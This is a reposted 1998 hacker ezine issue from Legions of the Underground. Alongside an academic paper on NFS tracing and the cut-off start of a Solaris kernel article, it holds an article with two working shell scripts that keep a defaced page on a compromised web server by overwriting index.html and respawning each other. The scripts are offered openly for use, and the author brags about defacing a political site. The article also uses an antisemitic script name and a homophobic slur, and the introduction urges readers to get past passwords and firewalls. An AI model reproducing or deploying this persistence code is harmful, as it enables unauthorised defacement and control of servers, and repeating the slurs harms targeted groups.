Copy Link
Add to Bookmark
Report

Keen Veracity Issue 04

eZine's profile picture
Published in 
Keen Veracity
 · 26 Apr 2019

  

###########################################
| Keen Veracity |
| Issue 4 November 1998 |
| Legions of the Underground |
###########################################

And my soul passed into the data havens, and at once
I was blessed with the knowledge of a thousand men.....

[http://www.legions.org]

---------------------------------------------------------------------------
Table of Contents
---------------------------------------------------------------------------

[1x8] Introduction Digital Ebola
[2x8] Resilence thru Scripts Duncan Silver
[3x8] NFS Tracing By Passive Network Monitoring Matt Blaze
[4x8] Kernel Mumblings (part 1 of N) FooPirata
[5x8] The Internet Protocol Suite m0f0
[6x8] Bic Balistics Nitro
[7x8] In the News Sources
[8x8] Exit() Digital Ebola


---------------------------------------------------------------------------
Introduction Digital Ebola
----------------------------------------------------------------------------

Well it looks like another issue of KV is upon us. We hope to provide many
exciting things in this issue as well as some changes. I would like to
introduce myself to you as the editor. I hope to bring you many changes, as
well as providing the best information I possibly can. I urge anyone with
articles or suggestions to send them to us, and participate in this forum,
you need not be a member of LoU to submit, as we are all members of a
greater research team, the human race. My wish, that you as readers, take
interest in this quest for knowledge, and share the wealth. May not a
password or firewall hinder you in this quest. The information it out there,
all it takes is the motivation and drive to aquire it and use it. On that
note, I give you Keen Veracity 4. Hope you like it.




---------------------------------------------------------------------------
Resilence thru Scripts Duncan Silver
---------------------------------------------------------------------------

Hey there kids. We are gathered here today to discuss this very
funny thing I thought of. It's nothing amazing, at least not in the
technical sense, however, it has provided us with many hours of hilarious,
enjoyable time. It all started when I found a certain politically oriented
site to be vulnerable to a variety of exploits. Seeing how the elections
are coming up in 2 weeks, we were sure this could provide allot of exposure
for whatever points we felt like sharing with general public. But alas, we
were saddened to find our "hacked" site remained up for pathetic 2 minutes
and 41 seconds, for the sys administrators were alert. Our access blocked,
our backdoors crushed beyond the point of existence. We screamed, cussed,
spilled coffee on the keyboard, and attempted to physically harm each other,
for our grief was unbearable. Hours of work, gone to waste. That's when I
got the ingenious idea. What if we could magically make sure the "hacked"
site was there, even if we weren't on the system, or even had any type of
access to it? Within minutes the script was whipped together, escorted by
many hits on the head by my comrades, as I'd make shell syntax errors. We
called it Jew. Nothing is more resilient than a Jew. And that's the idea
behind this script. I say script, although in reality, they are two
scripts, bound in a variation of client/server relationship. The basic idea
is that we have script #1 running, making sure the hacked site is where it's
supposed to be, and script #2 making sure the script #1 is running. Here is
the source of script #1, or the client. I assume you know basic shell
scripting.

#!/bin/sh
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% Program ID: 78594b32 of the delta quadroon AKA JEW.SH % %
#% Programmer : Duncan Silver of L.O.U. % %
#% Why : Practical purposes and extensive free time % %
#% Function : Client % %
#% %
#% %
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#The fourth output argument of command clock gives time in xx:xx:xx format
set $(clock)
clone="$4"
cp $0 $clone

echo $0 > ptty0001
echo $clone > ptty0002

while [ "$0" ]; do

#change path appropriatelly
grep fag /home/httpd/html/index.html > temp
set $(wc -l temp)
lines="$1"
if [ "$lines" -ge "1" ]; then

#The : command does nothing.
:
else
cp ./index.html /home/httpd/html/index.html
fi
sleep 4
done

exit 1
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Now let's take a look at the server side of it:

%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Program ID: httpd.sh %
% Function: Server %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#!/bin/sh
#function

it_is_all_good() {
:
}

it_is_all_bad() {
./$copy &
if [ -f $org ]; then
rm $org
fi

}

while [ "$0" ]; do
read org < ptty0001
read copy < ptty0002
sleep 4
ps -aux | grep $org > temp_h

set $(wc -l temp_h)
len="$1"

case "$len" in
0) it_is_all_bad;;
1) grep grep temp_h > temp_h
set $(wc -l temp_h)
if [ "$1" = "1" ]; then
it_is_all_bad
else
it_is_all_good
fi
;;

2) it_is_all_good;;
esac

done
exit 1
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Alright, now, if you are any good at all, you know what's up. For the
logically challenged ones, here is the outline in English.

* Script #1 starts up
* Make a copy of itself with a random name
* Store the name of self and copy in ptty001 and ptty0002 respectively
* do (never ending loop)
* grep for a unique word in index.html to verify the hacked site is up
* IF: word found THEN: sit peacefully, check back in 4 seconds
* IF: word not found THEN: copy hacked site over index.html
* done (back to do)


* Script #2 starts up
* do (never ending loop)
* Open ptty001 reads whatever's in there (if you see above, ptty001 should
contain the name of the running script)
* Using ps check if there is a process with that name.

* IF: process found THEN: sit peacefully check back in 4 seconds
* IF: process not found THEN: open ptty002, read name of the copy
start the copy
back to the beginning.
done (back to do)

Of course the English summary doesn't cover a few extra steps which make up
for neatness, but you get the idea. As you can see, the major flaw is that
the whole scheme is dependent upon the idea that httpd.sh remains running.
Of course we could add a line in httpd.sh to trap kill signal and restart a
copy of itself, but I'll leave the refinements up to you, (I'm not getting
paid for this you know.) What I give you is a working skeleton, with all
major problems solved, I simply don't want to bother with little ones.
That's my contribution to KV4, thank you for joining us, and god bless.
PS: name calling, spam mail, insults about my mother, pointless ramblings
about how l33t you are, as well as job offers, can be directed to
silver@megsinet.net



---------------------------------------------------------------------------
NFS Tracing By Passive Network Monitoring Matt Blaze
---------------------------------------------------------------------------

comments: mab@cs.princeton.edu

ABSTRACT

Traces of filesystem activity have proven to be useful for a wide variety of
purposes, ranging from quantitative analysis of system behavior to
trace-driven simulation of filesystem algorithms. Such traces can be
difficult to obtain, however, usually entailing modification of the
filesystems to be monitored and runtime overhead for the period of the
trace. Largely because of these difficulties, a surprisingly small number of
filesystem traces have been conducted, and few sample workloads are
available to filesystem researchers.

This paper describes a portable toolkit for deriving approximate traces of
NFS [1] activity by non-intrusively monitoring the Ethernet traffic to and
from the file server. The toolkit uses a promiscuous Ethernet listener
interface (such as the Packetfilter[2]) to read and reconstruct NFS-related
RPC packets intended for the server. It produces traces of the NFS activity
as well as a plausible set of corresponding client system calls. The tool is
currently in use at Princeton and other sites, and is available via
anonymous ftp.

1. Motivation

Traces of real workloads form an important part of virtually all analysis of
computer system behavior, whether it is program hot spots, memory access
patterns, or filesystem activity that is being studied. In the case of
filesystem activity, obtaining useful traces is particularly challenging.
Filesystem behavior can span long time periods, often making it necessary to
collect huge traces over weeks or even months. Modification of the
filesystem to collect trace data is often difficult, and may result in
unacceptable runtime overhead. Distributed filesystems exa cerbate these
difficulties, especially when the network is composed of a large number of
heterogeneous machines. As a result of these difficulties, only a relatively
small number of traces of Unix filesystem workloads have been conducted,
primarily in computing research environments. [3], [4] and [5] are examples
of such traces.

Since distributed filesystems work by transmitting their activity over a
network, it would seem reasonable to obtain traces of such systems by
placing a "tap" on the network and collecting trace data based on the
network traffic. Ethernet[6] based networks lend themselves to this approach
particularly well, since traffic is broadcast to all machines connected to a
given subnetwork. A number of general-purpose network monitoring tools are
avail able that "promiscuously" listen to the Ethernet to which they are
connected; Sun's etherfind[7] is an example of such a tool. While these
tools are useful for observing (and collecting statistics on) specific types
of packets, the information they provide is at too low a level to be useful
for building filesystem traces. Filesystem operations may span several
packets, and may be meaningful only in the context of other, previous
operations.

Some work has been done on characterizing the impact of NFS traffic on
network load. In [8], for example, the results of a study are reported in
which Ethernet traffic was monitored and statistics gathered on NFS
activity. While useful for understanding traffic patterns and developing a
queueing model of NFS loads, these previous stu dies do not use the network
traffic to analyze the file access traffic patterns of the system, focusing
instead on developing a statistical model of the individual packet sources,
destinations, and types.


This paper describes a toolkit for collecting traces of NFS file access
activity by monitoring Ethernet traffic. A "spy" machine with a promiscuous
Ethernet interface is connected to the same network as the file server. Each
NFS-related packet is analyzed and a trace is produced at an appropriate
level of detail. The tool can record the low level NFS calls themselves or
an approximation of the user-level system calls (open, close, etc.) that
triggered the activity.

We partition the problem of deriving NFS activity from raw network traffic
into two fairly distinct subprob lems: that of decoding the low-level NFS
operations from the packets on the network, and that of translating these
low-level commands back into user-level system calls. Hence, the toolkit
consists of two basic parts, an "RPC decoder" (rpcspy) and the "NFS
analyzer"
(nfstrace). rpcspy communicates with a low-level network
monitoring facility (such as Sun's NIT [9] or the Packetfilter [2]) to read
and reconstruct the RPC transactions (call and reply) that make up each NFS
command. nfstrace takes the output of rpcspy and reconstructs the sys tem
calls that occurred as well as other interesting data it can derive about
the structure of the filesystem, such as the mappings between NFS file
handles and Unix file names. Since there is not a clean one-to-one mapping
between system calls and lower-level NFS commands, nfstrace uses some simple
heuristics to guess a reasonable approximation of what really occurred.

1.1. A Spy's View of the NFS Protocols

It is well beyond the scope of this paper to describe the protocols used by
NFS; for a detailed description of how NFS works, the reader is referred to
[10], [11], and [12]. What follows is a very brief overview of how NFS
activity translates into Ethernet packets.

An NFS network consists of servers, to which filesystems are physically
connected, and clients, which per form operations on remote server
filesystems as if the disks were locally connected. A particular machine can
be a client or a server or both. Clients mount remote server filesystems in
their local hierarchy just as they do local filesystems; from the user's
perspective, files on NFS and local filesystems are (for the most part)
indistinguishable, and can be manipulated with the usual filesystem calls.

The interface between client and server is defined in terms of 17 remote
procedure call (RPC) operations. Remote files (and directories) are referred
to by a file handle that uniquely identifies the file to the server. There
are operations to read and write bytes of a file (read, write), obtain a
file's attributes (getattr), obtain the contents of directories (lookup,
readdir), create files (create), and so forth. While most of these
operations are direct analogs of Unix system calls, notably absent are open
and close operations; no client state information is maintained at the
server, so there is no need to inform the server explicitly when a file is
in use. Clients can maintain buffer cache entries for NFS files, but must
verify that the blocks are still valid (by checking the last write time with
the getattr operation) before using the cached data.

An RPC transaction consists of a call message (with arguments) from the
client to the server and a reply mes sage (with return data) from the server
to the client. NFS RPC calls are transmitted using the UDP/IP connection
less unreliable datagram protocol[13]. The call message contains a unique
transaction identifier which is included in the reply message to enable the
client to match the reply with its call. The data in both messages is
encoded in an "external data representation" (XDR), which provides a
machine-independent standard for byte order, etc.

Note that the NFS server maintains no state information about its clients,
and knows nothing about the context of each operation outside of the
arguments to the operation itself.

2. The rpcspy Program

rpcspy is the interface to the system-dependent Ethernet monitoring
facility; it produces a trace of the RPC calls issued between a given set of
clients and servers. At present, there are versions of rpcspy for a number
of BSD-derived systems, including ULTRIX (with the Packetfilter[2]), SunOS
(with NIT[9]), and the IBM RT running AOS (with the Stanford enet filter).

For each RPC transaction monitored, rpcspy produces an ASCII record
containing a timestamp, the name of the server, the client, the length of
time the command took to execute, the name of the RPC command executed, and
the command- specific arguments and return data. Currently, rpcspy
understands and can decode the 17 NFS RPC commands, and there are hooks to
allow other RPC services (for example, NIS) to be added reasonably easily.


The output may be read directly or piped into another program (such as
nfstrace) for further analysis; the for mat is designed to be reasonably
friendly to both the human reader and other programs (such as nfstrace or
awk).

Since each RPC transaction consists of two messages, a call and a reply,
rpcspy waits until it receives both these components and emits a single
record for the entire transaction. The basic output format is 8 vertical-bar
separated fields:

timestamp | execution-time | server | client | command-name | arguments |
reply-data

where timestamp is the time the reply message was received, execution-time
is the time (in microseconds) that elapsed between the call and reply,
server is the name (or IP address) of the server, client is the name (or IP
address) of the client followed by the userid that issued the command,
command-name is the name of the particular program invoked (read, write,
getattr, etc.), and arguments and reply-data are the command dependent
arguments and return values passed to and from the RPC program,
respectively.

The exact format of the argument and reply data is dependent on the specific
command issued and the level of detail the user wants logged. For example, a
typical NFS command is recorded as follows:

690529992.167140 | 11717 | paramount | merckx.321 | read |
{"7b1f00000000083c", 0, 8192} | ok, 1871

In this example, uid 321 at client "merckx" issued an NFS read command to
server "paramount". The reply was issued at (Unix time) 690529992.167140
seconds; the call command occurred 11717 microseconds earlier. Three
arguments are logged for the read call: the file handle from which to read
(represented as a hexadecimal string), the offset from the beginning of the
file, and the number of bytes to read. In this example, 8192 bytes are
requested starting at the beginning (byte 0) of the file whose handle is
"7b1f00000000083c". The command completed successfully (status "ok"), and
1871 bytes were returned. Of course, the reply message also included the
1871 bytes of data from the file, but that field of the reply is not logged
by rpcspy.

rpcspy has a number of configuration options to control which hosts and RPC
commands are traced, which call and reply fields are printed, which Ethernet
interfaces are tapped, how long to wait for reply messages, how long to run,
etc. While its primary function is to provide input for the nfstrace program
(see Section 3), judi cious use of these options (as well as such programs
as grep, awk, etc.) permit its use as a simple NFS diag nostic and
performance monitoring tool. A few screens of output give a surprisingly
informative snapshot of current NFS activity; we have identified quickly
using the program several problems that were otherwise difficult to
pinpoint. Similarly, a short awk script can provide a breakdown of the most
active clients, servers, and hosts over a sampled time period.

2.1. Implementation Issues

The basic function of rpcspy is to monitor the network, extract those
packets containing NFS data, and print the data in a useful format. Since
each RPC transaction consists of a call and a reply, rpcspy maintains a
table of pending call packets that are removed and emitted when the matching
reply arrives. In normal operation on a reasonably fast workstation, this
rarely requires more than about two megabytes of memory, even on a busy net
work with unusually slow file servers. Should a server go down, however, the
queue of pending call messages (which are never matched with a reply) can
quickly become a memory hog; the user can specify a maximum size the table
is allowed to reach before these "orphaned" calls are searched out and
reclaimed.

File handles pose special problems. While all NFS file handles are a fixed
size, the number of significant bits varies from implementation to
implementation; even within a vendor, two different releases of the same
operating system might use a completely different internal handle format. In
most Unix implementations, the handle contains a filesystem identifier and
the inode number of the file; this is sometimes augmented by additional
information, such as a version number. Since programs using rpcspy output
generally will use the handle as a unique file identifier, it is important
that there not appear to be more than one handle for the same file.
Unfortunately, it is not sufficient to simply consider the handle as a
bitstring of the maximum handle size, since many operating systems do not
zero out the unused extra bits before assigning the handle. Fortunately,
most servers are at least consistent in the sizes of the handles they
assign. rpcspy allows the user to specify (on the command line or in a
startup file) the handle size for each host to be monitored. The handles
from that server are emitted as hexadecimal strings truncated at that
length. If no size is specified, a guess is made based on a few common
formats of a reasonable size.


It is usually desirable to emit IP addresses of clients and servers as their
symbolic host names. An early ver sion of the software simply did a
nameserver lookup each time this was necessary; this quickly flooded the
network with a nameserver request for each NFS transaction. The current
version maintains a cache of host names; this requires a only a modest
amount of memory for typical networks of less than a few hundred hosts. For
very large networks or those where NFS service is provided to a large number
of remote hosts, this could still be a potential problem, but as a last
resort remote name resolution could be disabled or rpcspy configured to not
translate IP addresses.

UDP/IP datagrams may be fragmented among several packets if the datagram is
larger than the maximum size of a single Ethernet frame. rpcspy looks only
at the first fragment; in practice, fragmentation occurs only for the data
fields of NFS read and write transactions, which are ignored anyway.

3. nfstrace: The Filesystem Tracing Package

Although rpcspy provides a trace of the low-level NFS commands, it is not,
in and of itself, sufficient for obtaining useful filesystem traces. The
low-level commands do not by themselves reveal user-level activity. Furth
ermore, the volume of data that would need to be recorded is potentially
enormous, on the order of megabytes per hour. More useful would be an
abstraction of the user-level system calls underlying the NFS activity.

nfstrace is a filter for rpcspy that produces a log of a plausible set of
user level filesystem commands that could have triggered the monitored
activity. A record is produced each time a file is opened, giving a summary
of what occurred. This summary is detailed enough for analysis or for use as
input to a filesystem simulator.

The output format of nfstrace consists of 7 fields:

timestamp | command-time | direction | file-id | client | transferred | size

where timestamp is the time the open occurred, command-time is the length of
time between open and close, direc tion is either read or write (mkdir and
readdir count as write and read, respectively). file-id identifies the
server and the file handle, client is the client and user that performed the
open, transferred is the number of bytes of the file actually read or
written (cache hits have a 0 in this field), and size is the size of the
file (in bytes).

An example record might be as follows:

690691919.593442 | 17734 | read | basso:7b1f00000000400f | frejus.321 | 0 |
24576

Here, userid 321 at client frejus read file 7b1f00000000400f on server
basso. The file is 24576 bytes long and was able to be read from the client
cache. The command started at Unix time 690691919.593442 and took 17734
microseconds at the server to execute.

Since it is sometimes useful to know the name corresponding to the handle
and the mode information for each file, nfstrace optionally produces a map
of file handles to file names and modes. When enough information (from
lookup and readdir commands) is received, new names are added. Names can
change over time (as files are deleted and renamed), so the times each
mapping can be considered valid is recorded as well. The mapping infor
mation may not always be complete, however, depending on how much activity
has already been observed. Also, hard links can confuse the name mapping,
and it is not always possible to determine which of several possible names a
file was opened under.

What nfstrace produces is only an approximation of the underlying user
activity. Since there are no NFS open or close commands, the program must
guess when these system calls occur. It does this by taking advantage of the
observation that NFS is fairly consistent in what it does when a file is
opened. If the file is in the local buffer cache, a getattr call is made on
the file to verify that it has not changed since the file was cached.
Otherwise, the actual bytes of the file are fetched as they are read by the
user. (It is possible that part of the file is in the cache and part is not,
in which case the getattr is performed and only the missing pieces are
fetched. This occurs most often when a demand-paged executable is loaded).
nfstrace assumes that any sequence of NFS read calls on the same file issued
by the same user at the same client is part of a single open for read. The
close is assumed to have taken place when the last read in the sequence
completes. The end of a read sequence is detected when the same client reads
the beginning of the file again or when a timeout with no reading has
elapsed. Writes are handled in a similar manner.


Reads that are entirely from the client cache are a bit harder; not every
getattr command is caused by a cache read, and a few cache reads take place
without a getattr. A user level stat system call can sometimes trigger a
getattr, as can an ls -l command. Fortunately, the attribute caching used by
most implementations of NFS seems to eliminate many of these extraneous
getattrs, and ls commands appear to trigger a lookup command most of the
time. nfstrace assumes that a getattr on any file that the client has read
within the past few hours represents a cache read, otherwise it is ignored.
This simple heuristic seems to be fairly accurate in practice. Note also
that a getattr might not be performed if a read occurs very soon after the
last read, but the time threshold is generally short enough that this is
rarely a problem. Still, the cached reads that nfstrace reports are, at
best, an estimate (generally erring on the side of over-reporting). There is
no way to determine the number of bytes actually read for cache hits.

The output of nfstrace is necessarily produced out of chronological order,
but may be sorted easily by a post-processor.

nfstrace has a host of options to control the level of detail of the trace,
the lengths of the timeouts, and so on. To facilitate the production of very
long traces, the output can be flushed and checkpointed at a specified inter
val, and can be automatically compressed.

4. Using rpcspy and nfstrace for Filesystem Tracing

Clearly, nfstrace is not suitable for producing highly accurate traces;
cache hits are only estimated, the timing information is imprecise, and data
from lost (and duplicated) network packets are not accounted for. When such
a highly accurate trace is required, other approaches, such as modification
of the client and server kernels, must be employed.

The main virtue of the passive-monitoring approach lies in its simplicity.
In [5], Baker, et al, describe a trace of a distributed filesystem which
involved low-level modification of several different operating system
kernels. In contrast, our entire filesystem trace package consists of less
than 5000 lines of code written by a single programmer in a few weeks,
involves no kernel modifications, and can be installed to monitor multiple
heterogeneous servers and clients with no knowledge of even what operating
systems they are running.

The most important parameter affecting the accuracy of the traces is the
ability of the machine on which rpcspy is running to keep up with the
network traffic. Although most modern RISC workstations with reasonable
Ethernet interfaces are able to keep up with typical network loads, it is
important to determine how much informa tion was lost due to packet buffer
overruns before relying upon the trace data. It is also important that the
trace be, indeed, non-intrusive. It quickly became obvious, for example,
that logging the traffic to an NFS filesystem can be problematic.

Another parameter affecting the usefulness of the traces is the validity of
the heuristics used to translate from RPC calls into user-level system
calls. To test this, a shell script was written that performed ls -l, touch,
cp and wc commands randomly in a small directory hierarchy, keeping a record
of which files were touched and read and at what time. After several hours,
nfstrace was able to detect 100% of the writes, 100% of the uncached reads,
and 99.4% of the cached reads. Cached reads were over-reported by 11%, even
though ls com mands (which cause the "phantom" reads) made up 50% of the
test activity. While this test provides encouraging evidence of the accuracy
of the traces, it is not by itself conclusive, since the particular workload
being monitored may fool nfstrace in unanticipated ways.

As in any research where data are collected about the behavior of human
subjects, the privacy of the individu als observed is a concern. Although
the contents of files are not logged by the toolkit, it is still possible to
learn something about individual users from examining what files they read
and write. At a minimum, the users of a mon itored system should be informed
of the nature of the trace and the uses to which it will be put. In some
cases, it may be necessary to disable the name translation from nfstrace
when the data are being provided to others. Commercial sites where filenames
might reveal something about proprietary projects can be particularly
sensitive to such concerns.


5. A Trace of Filesystem Activity in the Princeton C.S. Department

A previous paper[14] analyzed a five-day long trace of filesystem activity
conducted on 112 research worksta tions at DEC-SRC. The paper identified a
number of file access properties that affect filesystem caching perfor
mance; it is difficult, however, to know whether these properties were
unique artifacts of that particular environment or are more generally
applicable. To help answer that question, it is necessary to look at similar
traces from other computing environments.

It was relatively easy to use rpcspy and nfstrace to conduct a week long
trace of filesystem activity in the Princeton University Computer Science
Department. The departmental computing facility serves a community of
approximately 250 users, of which about 65% are researchers (faculty,
graduate students, undergraduate researchers, postdoctoral staff, etc), 5%
office staff, 2% systems staff, and the rest guests and other "external"
users. About 115 of the users work full-time in the building and use the
system heavily for electronic mail, netnews, and other such communication
services as well as other computer science research oriented tasks (editing,
compiling, and executing programs, formatting documents, etc).

The computing facility consists of a central Auspex file server (fs) (to
which users do not ordinarily log in directly), four DEC 5000/200s (elan,
hart, atomic and dynamic) used as shared cycle servers, and an assortment of
dedicated workstations (NeXT machines, Sun workstations, IBM-RTs, Iris
workstations, etc.) in indi vidual offices and laboratories. Most users log
in to one of the four cycle servers via X window terminals located in
offices; the terminals are divided evenly among the four servers. There are
a number of Ethernets throughout the building. The central file server is
connected to a "machine room network" to which no user terminals are
directly connected; traffic to the file server from outside the machine room
is gatewayed via a Cisco router. Each of the four cycle servers has a local
/, /bin and /tmp filesystem; other filesystems, including /usr, /usr/local,
and users' home directories are NFS mounted from fs. Mail sent from local
machines is delivered locally to the (shared) fs:/usr/spool/mail; mail from
outside is delivered directly on fs.

The trace was conducted by connecting a dedicated DEC 5000/200 with a local
disk to the machine room net work. This network carries NFS traffic for all
home directory access and access to all non-local cycle-server files
(including the most of the actively-used programs). On a typical weekday,
about 8 million packets are transmitted over this network. nfstrace was
configured to record opens for read and write (but not directory accesses or
individual reads or writes). After one week (wednesday to wednesday),
342,530 opens for read and 125,542 opens for write were recorded, occupying
8 MB of (compressed) disk space. Most of this traffic was from the four
cycle servers.

No attempt was made to "normalize" the workload during the trace period.
Although users were notified that file accesses were being recorded, and
provided an opportunity to ask to be excluded from the data collection, most
users seemed to simply continue with their normal work. Similarly, no
correction is made for any anomalous user activity that may have occurred
during the trace.

5.1. The Workload Over Time

Intuitively, the volume of traffic can be expected to vary with the time of
day. Figure 1 shows the number of reads and writes per hour over the seven
days of the trace; in particular, the volume of write traffic seems to
mirror the general level of departmental activity fairly closely.

An important metric of NFS performance is the client buffer cache hit rate.
Each of the four cycle servers allocates approximately 6MB of memory for the
buffer cache. The (estimated) aggregate hit rate (percentage of reads served
by client caches) as seen at the file server was surprisingly low: 22.2%
over the entire week. In any given hour, the hit rate never exceeded 40%.
Figure 2 plots (actual) server reads and (estimated) cache hits per hour
over the trace week; observe that the hit rate is at its worst during
periods of the heaviest read activity.

Past studies have predicted much higher hit rates than the aggregate
observed here. It is probable that since most of the traffic is generated by
the shared cycle servers, the low hit rate can be attributed to the large
number of users competing for cache space. In fact, the hit rate was
observed to be much higher on the single-user worksta tions monitored in the
study, averaging above 52% overall. This suggests, somewhat
counter-intuitively, that if more computers were added to the network (such
that each user had a private workstation), the server load would decrease
considerably. Figure 3 shows the actual cache misses and estimated cache
hits for a typical private works tation in the study.


Thu 00:00 Thu 06:00 Thu 12:00 Thu 18:00 Fri 00:00 Fri 06:00 Fri 12:00
Fri 18:00 Sat 00:00 Sat 06:00 Sat 12:00 Sat 18:00 Sun 00:00 Sun 06:00 Sun
12:00 Sun 18:00 Mon 00:00 Mon 06:00 Mon 12:00 Mon 18:00 Tue 00:00 Tue 06:00
Tue 12:00 Tue 18:00 Wed 00:00 Wed 06:00 Wed 12:00 Wed 18:00

1000

2000

3000

4000

5000

6000

Reads/Writes per hour

Writes

Reads (all)

Figure 1 - Read and Write Traffic Over Time

5.2. File Sharing

One property observed in the DEC-SRC trace is the tendency of files that are
used by multiple workstations to make up a significant proportion of read
traffic but a very small proportion of write traffic. This has important
implications for a caching strategy, since, when it is true, files that are
cached at many places very rarely need to be invalidated. Although the
Princeton computing facility does not have a single workstation per user, a
similar metric is the degree to which files read by more than one user are
read and written. In this respect, the Princeton trace is very similar to
the DEC-SRC trace. Files read by more than one user make up more than 60% of
read traffic, but less than 2% of write traffic. Files shared by more than
ten users make up less than .2% of write traffic but still more than 30% of
read traffic. Figure 3 plots the number of users who have previously read
each file against the number of reads and writes.

5.3. File "Entropy"

Files in the DEC-SRC trace demonstrated a strong tendency to "become"
read-only as they were read more and more often. That is, the probability
that the next operation on a given file will overwrite the file drops off
shar ply in proportion to the number of times it has been read in the past.
Like the sharing property, this has implications for a caching strategy,
since the probability that cached data is valid influences the choice of a
validation scheme. Again, we find this property to be very strong in the
Princeton trace. For any file access in the trace, the probability that it
is a write is about 27%. If the file has already been read at least once
since it was last written to, the write probability drops to 10%. Once the
file has been read at least five times, the write probability drops below
1%. Fig ure 4 plots the observed write probability against the number of
reads since the last write.


Thu 00:00 Thu 06:00 Thu 12:00 Thu 18:00 Fri 00:00 Fri 06:00 Fri 12:00
Fri 18:00 Sat 00:00 Sat 06:00 Sat 12:00 Sat 18:00 Sun 00:00 Sun 06:00 Sun
12:00 Sun 18:00 Mon 00:00 Mon 06:00 Mon 12:00 Mon 18:00 Tue 00:00 Tue 06:00
Tue 12:00 Tue 18:00 Wed 00:00 Wed 06:00 Wed 12:00 Wed 18:00

1000

2000

3000

4000

5000

Total reads per hour

Cache Hits (estimated)

Cache Misses (actual)

Figure 2 - Cache Hits and Misses Over Time

6. Conclusions

Although filesystem traces are a useful tool for the analysis of current and
proposed systems, the difficulty of collecting meaningful trace data makes
such traces difficult to obtain. The performance degradation introduced by
the trace software and the volume of raw data generated makes traces over
long time periods and outside of comput ing research facilities particularly
hard to conduct.

Although not as accurate as direct, kernel-based tracing, a passive network
monitor such as the one described in this paper can permit tracing of
distributed systems relatively easily. The ability to limit the data
collected to a high-level log of only the data required can make it
practical to conduct traces over several months. Such a long term trace is
presently being conducted at Princeton as part of the author's research on
filesystem caching. The non-intrusive nature of the data collection makes
traces possible at facilities where kernel modification is impracti cal or
unacceptable.

It is the author's hope that other sites (particularly those not doing
computing research) will make use of this toolkit and will make the traces
available to filesystem researchers.

7. Availability

The toolkit, consisting of rpcspy, nfstrace, and several support scripts,
currently runs under several BSD-derived platforms, including ULTRIX 4.x,
SunOS 4.x, and IBM-RT/AOS. It is available for anonymous ftp over the
Internet from samadams.princeton.edu, in the compressed tar file
nfstrace/nfstrace.tar.Z.


Thu 00:00 Thu 06:00 Thu 12:00 Thu 18:00 Fri 00:00 Fri 06:00 Fri 12:00
Fri 18:00 Sat 00:00 Sat 06:00 Sat 12:00 Sat 18:00 Sun 00:00 Sun 06:00 Sun
12:00 Sun 18:00 Mon 00:00 Mon 06:00 Mon 12:00 Mon 18:00 Tue 00:00 Tue 06:00
Tue 12:00 Tue 18:00 Wed 00:00 Wed 06:00 Wed 12:00 Wed 18:00 0

100

200

300

Reads per hour

Cache Hits (estimated)

Cache Misses (actual)

Figure 3 - Cache Hits and Misses Over Time - Private Workstation

0 5 10 15 20

n (readers)

0

20

40

60

80

100

% of Reads and Writes used by > n users

Reads

Writes

Figure 4 - Degree of Sharing for Reads and Writes


0 5 10 15 20

Reads Since Last Write

0.0

0.1

0.2

P(next operation is write)

Figure 5 - Probability of Write Given >= n Previous Reads

8. Acknowledgments

The author would like to gratefully acknowledge Jim Roberts and Steve Beck
for their help in getting the trace machine up and running, Rafael Alonso
for his helpful comments and direction, and the members of the pro gram
committee for their valuable suggestions. Jim Plank deserves special thanks
for writing jgraph, the software which produced the figures in this paper.

9. References

[1] Sandberg, R., Goldberg, D., Kleiman, S., Walsh, D., & Lyon, B. "Design
and Implementation of the Sun Net work File System."
Proc. USENIX, Summer,
1985.

[2] Mogul, J., Rashid, R., & Accetta, M. "The Packet Filter: An Efficient
Mechanism for User-Level Network Code."
Proc. 11th ACM Symp. on Operating
Systems Principles, 1987.

[3] Ousterhout J., et al. "A Trace-Driven Analysis of the Unix 4.2 BSD File
System."
Proc. 10th ACM Symp. on Operating Systems Principles, 1985.

[4] Floyd, R. "Short-Term File Reference Patterns in a UNIX Environment,"
TR-177 Dept. Comp. Sci, U. of Rochester, 1986.

[5] Baker, M. et al. "Measurements of a Distributed File System," Proc. 13th
ACM Symp. on Operating Systems Principles, 1991.

[6] Metcalfe, R. & Boggs, D. "Ethernet: Distributed Packet Switching for
Local Computer Networks,"
CACM July, 1976.

[7] "Etherfind(8) Manual Page," SunOS Reference Manual, Sun Microsystems,
1988.

[8] Gusella, R. "Analysis of Diskless Workstation Traffic on an Ethernet,"
TR-UCB/CSD-87/379, University Of California, Berkeley, 1987.


[9] "NIT(4) Manual Page," SunOS Reference Manual, Sun Microsystems, 1988.

[10] "XDR Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[11] "RPC Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[12] "NFS Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[13] Postel, J. "User Datagram Protocol," RFC 768, Network Information
Center, 1980.

[14] Blaze, M., and Alonso, R., "Long-Term Caching Strategies for Very Large
Distributed File Systems,"
Proc. Summer 1991 USENIX, 1991.


---------------------------------------------------------------------------
Kernel Mumblings (part 1 of N) FooPirata
---------------------------------------------------------------------------

The purpose of this text is to quickly introduce the Solaris 2 kernel
structure, give a shot at some ways to play with it and give some basic tools
on how to deal with the inevitable machine crashes that will happen when
you start playing with your kernel.

Differently from our beloved Linux, Solaris, even in its x86 version,
does not come with sources. Those are propriety of Sun, and they can only be
bought by huge sums of money we just don't happen to have yet. But Sun, in
its incredible wisdom, now makes Solaris available to home users for the sole
price of the media,shipping and handling (about U$30). www.sun.com has more
details.

I became interested in kernel hacking after being introduced to it by
two great hackers - you readers probably don't know them - but if they ever
read this text, they'll know I am talking about them - TeleMig and Snoopy.

Introduction
============

As you all know by now, the kernel is the part of a Unix system where
the real magic happens. The kernel is responsible for the memory management,
the I/O, the timing and threading of the system. In fact, with no kernel or
a buggy one, your chances of achieving a smooth operation of your system are
close to zero.
Why would someone mess with the kernel then ?
Probably the most healthy reason would be curiosity. Nothing like
breaking something apart to see how it works. Of course there will be those
